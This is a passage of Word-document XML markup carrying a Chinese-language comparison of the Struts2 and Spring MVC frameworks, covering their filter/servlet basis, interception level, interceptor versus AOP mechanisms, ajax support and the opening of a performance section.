          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>struts2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（这里要指出，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>servlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是不同的。以前认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>servlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的一种特殊），这样就导致了二者的机制不同，这里就牵涉到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>servlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的区别了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F82509" w:rsidRDefault="00F82509" w:rsidP="00FE30BE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="260"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、主要机制</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91811">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="111111"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>   springmvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91811">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="111111"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是方法级别的拦截，一个方法对应一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91811">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="111111"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91811">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="111111"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上下文，而方法同时又跟一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91811">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="111111"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91811">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="111111"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对应</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91811">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="111111"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91811">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="111111"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参数的传递是直接注入到方法中的，是该方法独有的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>        struts2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是类级别的拦截，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一个类对应一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上下文，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> struts</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是在接受参数的时候，可以用属性来接受参数，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这就说明参数是让多个方法共享的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这也就无法用注解或其他方式标识其所属方法了</w:t>
      </w:r>
      <w:r w:rsidR="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00807239">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F8EF"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidR="00807239">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F8EF"/>
        </w:rPr>
        <w:t>会为每个请求生成一个</w:t>
      </w:r>
      <w:r w:rsidR="00807239">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F8EF"/>
        </w:rPr>
        <w:t>Action</w:t>
      </w:r>
      <w:r w:rsidR="00B86293">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F8EF"/>
        </w:rPr>
        <w:t>，保证线程安全</w:t>
      </w:r>
      <w:r w:rsidR="00682645">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F8EF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>        intercepter</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的实现机制。</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>struts</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>有以自己的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>interceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>机制，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">spring mvc </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用的是独立的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方式。这样导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>struts</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的配置文件量还是比</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>spring mvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>大，虽然</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>struts</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的配置能继承，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>spring mvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE30BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用更加简洁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0066686A" w:rsidRDefault="00967844" w:rsidP="00054AAD">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="260"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SpringMVC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ajax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的支持上要优于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>struts2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0066686A" w:rsidRDefault="0066686A" w:rsidP="00054AAD">
      <w:pPr>
        <w:ind w:firstLine="260"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>性能方面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>武断的说，一般环境下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
